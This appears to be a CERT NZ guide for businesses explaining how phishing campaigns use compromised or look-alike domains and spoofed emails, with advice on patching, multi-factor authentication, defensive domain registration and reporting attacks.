Scammers run phishing campaigns a lot, because they’re effective and don’t cost much to run. It's easy for them to send phishing emails to 10,000 people, for example. Even if only 5% of people respond by clicking a link in the email, they’ll still have had success with 500 people.
One of the challenges with phishing is that it exploits people’s everyday behaviour. Businesses often send emails to customers asking them to:
click on links to the business’s website
- log into their account when they get there.
Phishing scams mimic this behaviour to appear legitimate. And, whether it’s a legitimate request or a phishing attack, customers are likely to expect to do this. They'll follow the instructions they’re given, assuming the request is legitimate. But if it’s not, the scammers can:
- trick them into giving up their information or account login details, or
- install malicious software — like ransomware — on their computers.
How it works
Setting up a phishing campaign is a two-step process — the scammers need to:
• find somewhere they can host their campaign
• send phishing messages to their target audience.
Hosting a phishing campaign
Scammers like to target local websites (that use .nz domains) to make their phishing campaigns seem trustworthy. They may look for unpatched or insecure websites that they can take over.
Alternatively, the scammer could register for a domain name that's like their target brand's. They could do this by:
- using a different top level domain, such as .org instead of .co.nz
- misspelling the brand name.
For example, if your domain name is www.likemybusiness.co.nz, a scammer could set up a new domain name like:
- www.likemybusiness.org — using the .org domain instead of .co.nz, or
- www.Iikernybusiness.co.nz — which replaces the m with an rn and still looks very similar.
Many customers wouldn’t notice a small change like this. If a scammer targeted your domain name in this way, it could cause serious problems for your customers. It could also damage your business’s reputation.
Sending phishing emails
Once they have a place to host their campaign, the scammer can start sending out phishing emails. They'll create an email that mimics those sent by the brand they're impersonating. Then they'll send it out to the brand's customers in the hope that people will:
- respond to the email and provide their personal information to the scammer, or
- download malware onto their computers.
Many businesses use cloud-based email systems, like O365 or Gsuite, so it’s important to make sure they’re protected. If a scammer got access to one of your organisation’s email accounts, they could use it to send out phishing emails. Your customers may not realise that these emails are fake.
Research: attackers identify targets and objectives and get a list of email addresses.
Phishing page: the attacker creates a phishing page by compromising a domain or using a similar domain name to a common brand.
- Email sent: the email targets are sent a message to trick them into visiting the website.
Request actioned: the target enters information into the phishing page (credentials information) or is tricked into downloading malware.
- Information harvested: the attacker uses information in attacks or sells it. Attackers use malware to steal information or money, or to use the computer for other attacks.
How to protect your business against phishing attacks
You can help prevent an attack on your domain name by:
- making sure you install updates, or 'patches' to your operating systems and software. Patches don’t just add new features to your systems. They often fix security vulnerabilities too. If you don’t install patches when they’re released, scammers could exploit any known vulnerabilities to gain access to your website and host a phishing campaign
- protecting your email with multi-factor authentication. This can prevent your email account from being accessed by a scammer
- registering similar domain names to yours. When you register a domain name for your website, think about registering other, similar domain names too. It’s not expensive to do, and could stop scammers using your business to front a phishing attack
- checking your website from time to time. If you’re familiar with what’s on your site, you’ll notice if something changes when it shouldn’t. Then, if someone gains access to your website and changes it without your knowledge (to use it to host a phishing page or malware), you’ll know.
If your business is targeted by an attack
If you think your business is being targeted by a phishing attack, report it to CERT NZ. We’ll:
- investigate the phishing page, to understand where the web server is hosted and where the domain name is registered
- confirm whether the scammer has compromised your legitimate website, or set up a new domain name and replicated it
- try to make contact with the hosting or domain owner and have the phishing page taken down.
TIP: No matter how prepared you are, sometimes things go wrong. Knowing what to do during an attack is important — you’ll need a plan to help you get through what can be a stressful time. Check out our incident response planning guide to see how to make sure you're prepared.